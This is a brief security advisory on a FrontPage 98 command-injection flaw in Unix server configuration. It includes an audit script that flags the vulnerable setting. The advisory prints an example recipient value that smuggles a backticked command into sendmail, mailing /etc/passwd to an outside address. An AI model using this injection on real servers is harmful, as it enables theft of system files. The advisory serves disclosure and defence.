Vulnerability

Front Page 98

Affected

*NIX with FP

Description

Markus Stumpf found the following. He noticed another weakness, which is still present at least in FP98 with the version id:

    FPVersion="3.0.2.1330"

When a server is installed for Frontpage, the installation creates a file, usually /usr/local/frontpage/www.example.com:80.cnf. To get the feedback bot to send feedback via email, you can define the following within this file:

    SendmailCommand:/usr/sbin/sendmail %r

The "%r" above is substituted with the recipient's email address(es). With this setting you are vulnerable, because creating a feedback page with a recipient address of, e.g.,

    `/usr/bin/Mail -s 'password' nobody@example.com < /etc/passwd`

will execute the command

    /usr/sbin/sendmail `/usr/bin/Mail -s 'password' nobody@example.com < /etc/passwd`

and send the password file to nobody@example.com.

Solution

To avoid this, tell Frontpage to use the SMTP protocol to send emails by setting

    SMTPHost:mail.example.com

You will probably also want to set

    MailSender:webmaster@example.com
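To check existing installations for the setting described above, the following added example (not part of the original advisory and not FrontPage code) scans server .cnf files for a SendmailCommand that substitutes %r and reports whether SMTPHost is set. It assumes one "Key:value" setting per line with keys matched case-insensitively; the function names and finding codes are hypothetical.

```python
# Added example (not FrontPage code): audit server .cnf files for the
# SendmailCommand/%r setting described in the advisory.
# Assumptions: one "Key:value" setting per line, keys matched
# case-insensitively; function names and finding codes are hypothetical.
import glob
import sys

# Constructed sample: the vulnerable setting quoted in the advisory.
SAMPLE_VULNERABLE = "SendmailCommand:/usr/sbin/sendmail %r\n"


def parse_cnf(text):
    """Return {lowercased key: value} for each 'Key:value' line."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if ":" not in line:
            continue
        key, value = line.split(":", 1)
        settings[key.strip().lower()] = value.strip()
    return settings


def audit_cnf(text):
    """Return finding codes; an empty list means nothing was flagged."""
    settings = parse_cnf(text)
    findings = []
    command = settings.get("sendmailcommand")
    if command is not None:
        # %r is replaced with the recipient address from the feedback
        # page, so the recipient becomes part of the command line.
        if "%r" in command:
            findings.append("sendmail-recipient-substitution")
        # The advisory's fix is SMTP delivery; flag its absence.
        if not settings.get("smtphost"):
            findings.append("no-smtphost")
    return findings


if __name__ == "__main__":
    # Default location taken from the advisory ("usually" this directory).
    paths = sys.argv[1:] or glob.glob("/usr/local/frontpage/*.cnf")
    flagged = 0
    for path in paths:
        with open(path, encoding="latin-1") as handle:
            findings = audit_cnf(handle.read())
        for finding in findings:
            print(f"{path}: {finding}")
        flagged += bool(findings)
    sys.exit(1 if flagged else 0)
```

A SendmailCommand containing %r is flagged even when SMTPHost is also set, because the advisory does not say which setting takes precedence when both are present.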